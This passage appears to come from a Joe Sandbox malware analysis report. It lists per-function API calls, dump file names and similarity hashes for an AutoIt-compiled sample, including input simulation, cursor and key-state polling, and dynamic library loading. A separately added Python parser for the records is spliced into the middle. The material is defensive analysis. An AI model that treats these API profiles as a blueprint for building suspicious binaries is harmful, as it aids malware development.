                                                                                                                                                                            • Instruction Fuzzy Hash: E551B171600210AFDB10AF68C886F2A77E5FB55718F088199F915EF393C771AD45CBA2
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                            • Opcode ID: 2ff3ad4169cebd35ad2d3b27d8413cf78682b09974a7d8d0701cd38090f47456
                                                                                                                                                                            • Instruction ID: 120772ed1936db9c35a65e2b776e6c477720a313439bf6917240ada3e0959d8c
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ff3ad4169cebd35ad2d3b27d8413cf78682b09974a7d8d0701cd38090f47456
                                                                                                                                                                            • Instruction Fuzzy Hash: F021F7313002908FD7108F1BD894B177BD9FFA6315F188469E84ACB261DB71ED42CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008BEBAA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2434400541-0
                                                                                                                                                                            • Opcode ID: 5699ee80fe26990db61bdbace379be0d616966a23f650da308c598052510ed8f
                                                                                                                                                                            • Instruction ID: 7d188d82525f092992b7e7d31666b1605d82d92d60aeea674b85ea36da4118d4
                                                                                                                                                                            • Opcode Fuzzy Hash: 5699ee80fe26990db61bdbace379be0d616966a23f650da308c598052510ed8f
                                                                                                                                                                            • Instruction Fuzzy Hash: DAD017BA1A03042CEC291A3CC92FEF61A08F301760F90A259B003E9795E881AD049021
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008E0C44
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E0C7E
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E0CE8
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E0D50
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E0DD4
                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008E0E24
                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E0E63
                                                                                                                                                                              • Part of subcall function 0086FD60: _wcslen.LIBCMT ref: 0086FD6B
                                                                                                                                                                              • Part of subcall function 008B2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008B2AE8
                                                                                                                                                                              • Part of subcall function 008B2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008B2B1A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                            • API String ID: 1103490817-719923060
                                                                                                                                                                            • Opcode ID: 4f27c02793091af3ef312705e4f2007ffbeebe4a964b190685c36850d1ac99cd
                                                                                                                                                                            • Instruction ID: b16d4308add44cffe0266f03131ed49abfc9666c6fd1ba7dca6247b6ce045c74
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f27c02793091af3ef312705e4f2007ffbeebe4a964b190685c36850d1ac99cd
                                                                                                                                                                            • Instruction Fuzzy Hash: B4E1C2312083858FCB24DF29C84186AB7E6FF95318B14496DF896DB392DB70ED85CB52
                                                                                                                                                                            APIs
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085259A
                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 008525A2
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008525CD
                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 008525D5
                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 008525FA
                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00852617
                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00852627
                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0085265A
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0085266E
                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 0085268C
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 008526A8
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 008526B3
                                                                                                                                                                              • Part of subcall function 008519CD: GetCursorPos.USER32(?), ref: 008519E1
                                                                                                                                                                              • Part of subcall function 008519CD: ScreenToClient.USER32(00000000,?), ref: 008519FE
                                                                                                                                                                              • Part of subcall function 008519CD: GetAsyncKeyState.USER32(00000001), ref: 00851A23
                                                                                                                                                                              • Part of subcall function 008519CD: GetAsyncKeyState.USER32(00000002), ref: 00851A3D
                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,0085199C), ref: 008526DA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                                                                            • Opcode ID: 807391f90b4ee23ad49902726e8ad0bb8e8ab7e2e3e7a8a06c14cc531d208e3e
                                                                                                                                                                            • Instruction ID: c58ab19460719f766b8e6581908742828549c3e2e4a4df538555229f3e44f9ad
                                                                                                                                                                            • Opcode Fuzzy Hash: 807391f90b4ee23ad49902726e8ad0bb8e8ab7e2e3e7a8a06c14cc531d208e3e
                                                                                                                                                                            • Instruction Fuzzy Hash: 75B16875A00209AFDF14DFA8CC89BAA7BA5FB48315F104229FA15EB290DB70D945CB51
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E8CB9
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E8CCD
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E8CF0
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E8D13
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008E8D51
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,008E3F79,?), ref: 008E8DAD
                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008E8DE6
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008E8E29
                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008E8E60
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 008E8E6C
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008E8E7C
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 008E8E8B
                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008E8EA8
                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008E8EB4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                            • Opcode ID: 89713d3034e1fcfccc89d9806cf7748a2ec30901fcdea5790c789bdb6967a818
                                                                                                                                                                            • Instruction ID: 781eba1d715b650032a8601fa7a7f843963d1de5bf684f9a46090ad286529f43
                                                                                                                                                                            • Opcode Fuzzy Hash: 89713d3034e1fcfccc89d9806cf7748a2ec30901fcdea5790c789bdb6967a818
                                                                                                                                                                            • Instruction Fuzzy Hash: F761DE71600259FEEB14DF65CC81BBE7BA8FB09715F108506FD19DA1D0DB74AA84CBA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 008C4852
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C485D
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C48B4
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C48F2
                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 008C4930
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C4978
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C49B3
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C49E1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                            • Opcode ID: 2c413d5eef8dd0a4874ad0f671d30ab54cf90a3c712bea6bfda70d9c969b9cfc
                                                                                                                                                                            • Instruction ID: f527c8c90b7226683ed9f2eaa619dca05003bd8dd5b0f104dec40ca12d555793
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c413d5eef8dd0a4874ad0f671d30ab54cf90a3c712bea6bfda70d9c969b9cfc
                                                                                                                                                                            • Instruction Fuzzy Hash: BF71BE326042169FC710EF28C89096AB7F4FFA4759F00592DF896D7261EB30DD89CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 008B62BD
                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008B62CF
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008B62E6
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 008B62FB
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 008B6301
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 008B6311
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 008B6317
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008B6338
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008B6352
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008B635B
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008B63C2
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008B63FE
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008B6404
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 008B640B
                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 008B6462
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 008B646F
                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 008B6494
                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008B64BE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                            • Opcode ID: 86a08eec0fabf2654249ff2f5cbed14feddad5f0ac2f2f998794e18eca8e0e2a
                                                                                                                                                                            • Instruction ID: 9e96a0d2b7c58689c21acf1f5dad1ff27d99caf9e2308ef1284f6a3243de0771
                                                                                                                                                                            • Opcode Fuzzy Hash: 86a08eec0fabf2654249ff2f5cbed14feddad5f0ac2f2f998794e18eca8e0e2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 05718D31900709EFDB20DFA8CE85AAEBBF5FF48704F104528E146E62A0E779E954CB50
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 008D0784
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 008D078F
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 008D079A
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 008D07A5
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 008D07B0
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 008D07BB
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 008D07C6
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 008D07D1
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 008D07DC
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 008D07E7
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 008D07F2
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 008D07FD
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 008D0808
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 008D0813
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 008D081E
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 008D0829
                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 008D0839
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008D087B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                            • Opcode ID: 0e1353aefe7c9b6d98fd46ad85a841218145cd610e14273658e72f05f474a695
                                                                                                                                                                            • Instruction ID: a0d64178825e076774f90700ee51406af32a616d99bc99b9feb1c3f1a9fdd017
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e1353aefe7c9b6d98fd46ad85a841218145cd610e14273658e72f05f474a695
                                                                                                                                                                            • Instruction Fuzzy Hash: 184145B0D083196ADB10DFBA8C8595EBFE8FF04754B50452AE51CEB291DA78E901CF91
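The function records above are the Joe Sandbox IDA plugin's per-function summaries: the resolved API calls with their call-site addresses, the memory dump the code was lifted from, and the Similarity fields (API ID, String ID, API String ID, fuzzy hashes) that are meant to be pivoted on across reports. The parser below is an added example, not part of this report or of Joe Sandbox's own tooling. It assumes only the line layout visible above (bullet-prefixed "Key: value" lines under the section headers APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin and Similarity, with "Part of subcall function" entries nested under an API) and strips the "Download File" link text that the HTML export glues onto "Associated:" dump names. The sample input is constructed from the records on this page.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample in the shape of the records above. The "Download File" link text is
# kept on the "Associated:" line so the parser has to strip it, and one "Part of subcall"
# line is borrowed from the page's last record to exercise that nested form.
SAMPLE = """
APIs
• CharLowerBuffW.USER32(?,?), ref: 008C4852
• _wcslen.LIBCMT ref: 008C485D
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008C4978
  • Part of subcall function 0087047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 008704DE
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: SendString_wcslen$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1839972693-4113822522
• Instruction Fuzzy Hash: BF71BE326042169FC710EF28C89096AB7F4FFA4759F00592DF896D7261EB30DD89CB92
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 008D0784
• GetLastError.KERNEL32 ref: 008D087B
Similarity
• API ID: Cursor$Load$ErrorInfoLast
• String ID:
• API String ID: 3215588206-0
"""
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"  # interactive-page text appended to dump file names in the export
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w@?$]+)\.(?P<module>[\w.-]+)"        # e.g. mciSendStringW.WINMM
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]               # as printed; "?" means the plugin could not resolve the value
    ref: int                      # call-site address in the dump
    caller: Optional[int] = None  # set for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    associated: List[str] = field(default_factory=list)
    snapshot_file: str = ""
    similarity: Dict[str, str] = field(default_factory=dict)

def _kv(text: str):
    # Split "Key: value" on the first colon; value may be empty (e.g. "String ID:").
    key, _, value = text.partition(":")
    return key.strip(), value.strip()

def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        item = raw.strip().lstrip("•").strip()
        if not item:
            continue
        if item in SECTION_HEADERS:
            section = item
            if item == "APIs":            # every record opens with its API list
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:               # tail of a record cut off before its "APIs" header
            continue
        if item.endswith(LINK_RESIDUE):
            item = item[: -len(LINK_RESIDUE)].rstrip()
        if section == "APIs":
            m = API_RE.match(item)
            if m is None:
                raise ValueError(f"unrecognised API line: {item!r}")
            args = m["args"].split(",") if m["args"] is not None else []
            caller = int(m["caller"], 16) if m["caller"] else None
            current.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), caller))
            continue
        key, value = _kv(item)
        if section == "Memory Dump Source" and key == "Source File":
            parts = [p.strip() for p in value.split(",")]
            current.source_file = parts[0]
            for k, v in (_kv(p) for p in parts[1:]):
                if k == "Offset":
                    current.offset = int(v, 16)
                elif k == "based on PE":
                    current.based_on_pe = v.lower() == "true"
        elif section == "Memory Dump Source" and key == "Associated":
            current.associated.append(value)
        elif section == "Joe Sandbox IDA Plugin" and key == "Snapshot File":
            current.snapshot_file = value
        elif section == "Similarity":
            current.similarity[key] = value
    return records

def imported_apis(records: List[FunctionRecord]) -> List[str]:
    """Sorted MODULE!Name pairs over all records: a quick import profile of the dumped code."""
    return sorted({f"{c.module}!{c.name}" for r in records for c in r.apis})
```

Once the records are structured, the Similarity fields can be used as dictionary keys to match functions between two reports of related samples, and the MODULE!Name profile makes it easy to spot the runtime pieces (here USER32/WINMM/LIBCMT calls) without re-reading each listing.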
                                                                                                                                                                            APIs
                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00870456
                                                                                                                                                                              • Part of subcall function 0087047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0092170C,00000FA0,66094BAA,?,?,?,?,00892753,000000FF), ref: 008704AC
                                                                                                                                                                              • Part of subcall function 0087047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00892753,000000FF), ref: 008704B7
                                                                                                                                                                              • Part of subcall function 0087047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00892753,000000FF), ref: 008704C8
                                                                                                                                                                              • Part of subcall function 0087047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 008704DE
                                                                                                                                                                              • Part of subcall function 0087047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008704EC
                                                                                                                                                                              • Part of subcall function 0087047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008704FA
                                                                                                                                                                              • Part of subcall function 0087047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00870525
                                                                                                                                                                              • Part of subcall function 0087047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00870530
                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00870477
                                                                                                                                                                              • Part of subcall function 00870433: __onexit.LIBCMT ref: 00870439
                                                                                                                                                                            Strings
                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 008704B2
                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 008704E4
                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 008704F2
                                                                                                                                                                            • kernel32.dll, xrefs: 008704C3
                                                                                                                                                                            • InitializeConditionVariable, xrefs: 008704D8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                            • Opcode ID: 9cf91bb6b79e258b1397681de8a34f7e973a81cbdbd26ae199e473c89fb5fa2a
